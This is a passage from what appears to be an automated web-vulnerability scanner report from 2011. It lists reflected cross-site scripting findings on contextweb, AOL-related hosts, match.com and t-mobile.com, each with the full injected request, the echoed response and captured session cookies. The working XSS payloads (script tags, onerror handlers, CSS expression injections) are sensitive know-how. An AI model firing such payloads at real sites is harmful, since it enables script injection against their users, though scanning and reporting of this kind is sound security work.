Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB32
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -522817240
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="880834475e";alert(1)//3a7838ea4eb";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var
...[SNIP]...

1.228. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1746"%3balert(1)//4cea8b3177f was submitted in the cwwidth parameter. This input was echoed as f1746";alert(1)//4cea8b3177f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300f1746"%3balert(1)//4cea8b3177f&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -1325610449
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300f1746";alert(1)//4cea8b3177f";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="un
...[SNIP]...

1.229. http://web.lightningcast.net/servlets/getPlaylist [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.lightningcast.net
Path:   /servlets/getPlaylist

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d0606<script>alert(1)</script>fcd4b088c15 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlets/getPlaylist?ver=2.0&client=fcas3_1.12.2.2.BETA.AOL&fv=WIN%2010,2,154,25&attr=[Domain,aolnews.com][Autoplay,false][adamid,none]&baudit=server&tname=AutoplayOff&crlen=t&nwid=278524&content=NO_VIDEO_URL&format=Video-Flash-400-400x300&regions=StandardBanner&uid=952938212d0606<script>alert(1)</script>fcd4b088c15&level=News:Newsy&audit=param&resp=SMIL&pu=http%3A//www.aolnews.com/ HTTP/1.1
Host: web.lightningcast.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=true&isUI=true&%40videoList=811190944001&purl=http%3A//www.aolnews.com/&autoStart=false&playerID=81512831001&publisherID=1612833736&width=300&height=271&flashID=AOLVP_us_811190945001_player&videoSmoothing=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:06:15 GMT
Server: Apache/2.2.6 (Fedora)
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: -1
Connection: close
P3P: policyref="http://web.lightningcast.net/w3c/p3p.xml",CP="NON DSP COR CURa TAIo PSDo OUR IND PHY DEM STA LOC"
Content-Type: application/smil
Content-Length: 757

<smil xmlns:lc="http://web.lightningcast.com/2006/SMIL20/Language"
title="AOL US Playlist">
   <head>
       <meta name="template" content="AutoplayOff (98652) - v5"/>
       <meta name="gpserver" content="ntc-d
...[SNIP]...
<meta name="uuid" content="952938212d0606<script>alert(1)</script>fcd4b088c15"/>
...[SNIP]...

1.230. http://www.aolnews.com/category/nation/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolnews.com
Path:   /category/nation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd1e0"%3b020705af013 was submitted in the REST URL parameter 2. This input was echoed as bd1e0";020705af013 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /category/nationbd1e0"%3b020705af013/ HTTP/1.1
Host: www.aolnews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1300831459417-New%7C1363903459417%3B%20s_nrgvo%3DNew%7C1363903459422%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.e9e3; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.e9e3; _chartbeat2=ebfjqpkn5fqga7in

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:06:25 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Content-Length: 88720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
5.channel="us.news";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="";
s_265.prop2="main";
s_265.prop12="http://www.aolnews.com/category/nationbd1e0";020705af013/";
s_265.prop18="nationbd1e0\";020705af013";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.231. http://www.match.com/search/searchSubmit.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.match.com
Path:   /search/searchSubmit.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f318"style%3d"x%3aexpr/**/ession(alert(1))"0723e6100b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f318"style="x:expr/**/ession(alert(1))"0723e6100b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/searchSubmit.aspx?8f318"style%3d"x%3aexpr/**/ession(alert(1))"0723e6100b4=1 HTTP/1.1
Host: www.match.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Mar 2011 22:14:23 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=3/22/2011; expires=Thu, 22-Mar-2012 22:14:23 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=3/22/2011; domain=match.com; expires=Thu, 22-Mar-2012 22:14:23 GMT; path=/
Set-Cookie: MatchSession=CDTF=3/22/2011&UMID=adaa6668-2cb2-4dab-a2ce-7d067b013db0; expires=Thu, 22-Mar-2012 22:14:23 GMT; path=/
Set-Cookie: SECU=TID=0&ESID=52f2c63a-aae2-40f2-a436-ae1e38b2ff96&THEME=81; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><title>
   Match.c
...[SNIP]...
<a href="/search/search.aspx?8f318"style="x:expr/**/ession(alert(1))"0723e6100b4=1&exec=NOGO&lid=521">
...[SNIP]...

1.232. http://www.t-mobile.com//htmlservices/navigation/TMobileNavigation.ashx [currentURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   //htmlservices/navigation/TMobileNavigation.ashx

Issue detail

The value of the currentURL request parameter is copied into the HTML document as plain text between tags. The payload 57a08<img%20src%3da%20onerror%3dalert(1)>eddc8070d57 was submitted in the currentURL parameter. This input was echoed as 57a08<img src=a onerror=alert(1)>eddc8070d57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET //htmlservices/navigation/TMobileNavigation.ashx?func=tmo&appId=coverage&supportspanish=true&section=Coverage&currentURL=http%3A//t-mobile-coverage.t-mobile.com/4G-Network-Coverage%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLCjC8bEfwy%25208bEpBc57a08<img%20src%3da%20onerror%3dalert(1)>eddc8070d57&format=json&jsoncallback=jsonp1300828072116&_=1300828077092 HTTP/1.1
Host: www.t-mobile.com
Proxy-Connection: keep-alive
Referer: http://t-mobile-coverage.t-mobile.com/4G-Network-Coverage?cm_mmc_o=Kbl5kzYCjC-czywEwllCjCWwfcByLCjC8bEfwy%208bEpBc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; mr_referredVisitor=0; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; 53643872-VID=44502044936234

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: TMobileCommon=TeaId=f9fc3e1e-7aae-4222-8a55-f971ae891cd5; domain=.t-mobile.com; path=/
Date: Tue, 22 Mar 2011 21:23:56 GMT
Content-Length: 28888

jsonp1300828072116({"HeaderHTML":"<script charset=\"utf-8\" type=\"text/javascript\"> var mytmoUrl='https://my.t-mobile.com/Login/LoginController.aspx';<\/script><div><div id=\"brand\"><div id=\"logo\
...[SNIP]...
<a href=\"http://es.t-mobile-coverage.t-mobile.com/enes/4g-network-coverage?cm_mmc_o=kbl5kzycjc-czywewllcjcwwfcbylcjc8befwy%208bepbc57a08<img src=a onerror=alert(1)>eddc8070d57\" onclick=\"tm_spanish_setCookie('TMobileSpanish', 'IsSpanishUser=true');\">
...[SNIP]...

1.233. http://www.t-mobile.com/Company/Community.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /Company/Community.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a88e"style%3d"x%3aexpression(alert(1))"2fd5c36d2a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5a88e"style="x:expression(alert(1))"2fd5c36d2a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Company/Community.aspx?5a88e"style%3d"x%3aexpression(alert(1))"2fd5c36d2a5=1 HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileCommon=TeaId=e58e0348-61c2-4256-a2fc-c461eaa48b39; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=afqntx552pvg0lvukkcgptar; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=afqntx552pvg0lvukkcgptar; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!4%2f5%2f2011+10%3a08%3a57+PM; domain=.t-mobile.com; expires=Thu, 22-Mar-2012 22:08:57 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:08:57 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:08:57 GMT; path=/
Set-Cookie: TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; domain=.t-mobile.com; path=/
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 22 Mar 2011 22:08:57 GMT
Connection: close
Content-Length: 40945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<a class="tablink" href="/Company/Community.aspx?tp=Abt_Tab_Safety&amp;5a88e"style="x:expression(alert(1))"2fd5c36d2a5=1">
...[SNIP]...

1.234. http://www.t-mobile.com/Company/PrivacyResources.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /Company/PrivacyResources.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1246d"style%3d"x%3aexpression(alert(1))"1efb8937b00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1246d"style="x:expression(alert(1))"1efb8937b00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Company/PrivacyResources.aspx?1246d"style%3d"x%3aexpression(alert(1))"1efb8937b00=1 HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileCommon=TeaId=e58e0348-61c2-4256-a2fc-c461eaa48b39; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=gifrunnonu5c2w55q2u5jt55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gifrunnonu5c2w55q2u5jt55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!4%2f5%2f2011+10%3a08%3a58+PM; domain=.t-mobile.com; expires=Thu, 22-Mar-2012 22:08:58 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:08:58 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:08:58 GMT; path=/
Set-Cookie: TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; domain=.t-mobile.com; path=/
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 22 Mar 2011 22:08:58 GMT
Connection: close
Content-Length: 43208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<a class="tablink" href="/Company/PrivacyResources.aspx?tp=Abt_Tab_AccountSecurity&amp;1246d"style="x:expression(alert(1))"1efb8937b00=1">
...[SNIP]...

1.235. http://www.t-mobile.com/Company/Working.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /Company/Working.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbc1d"style%3d"x%3aexpression(alert(1))"70b00b389ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cbc1d"style="x:expression(alert(1))"70b00b389ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Company/Working.aspx?cbc1d"style%3d"x%3aexpression(alert(1))"70b00b389ab=1 HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileCommon=TeaId=e58e0348-61c2-4256-a2fc-c461eaa48b39; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zzvfz32sid4ssj34sihqkwvg; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zzvfz32sid4ssj34sihqkwvg; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!4%2f5%2f2011+10%3a08%3a58+PM; domain=.t-mobile.com; expires=Thu, 22-Mar-2012 22:08:58 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:08:58 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:08:58 GMT; path=/
Set-Cookie: TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; domain=.t-mobile.com; path=/
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 22 Mar 2011 22:08:57 GMT
Connection: close
Content-Length: 41726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<a class="tablink" href="/Company/Working.aspx?tp=Abt_Tab_Bidding&amp;cbc1d"style="x:expression(alert(1))"70b00b389ab=1">
...[SNIP]...

1.236. http://www.t-mobile.com/business/Information.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /business/Information.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c36fa"style%3d"x%3aexpression(alert(1))"58285901747 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c36fa"style="x:expression(alert(1))"58285901747 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/Information.aspx?c36fa"style%3d"x%3aexpression(alert(1))"58285901747=1 HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileCommon=TeaId=e58e0348-61c2-4256-a2fc-c461eaa48b39; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=3cdjgs45s2mfq0453dihde55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3cdjgs45s2mfq0453dihde55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!4%2f5%2f2011+10%3a08%3a59+PM; domain=.t-mobile.com; expires=Thu, 22-Mar-2012 22:08:59 GMT; path=/
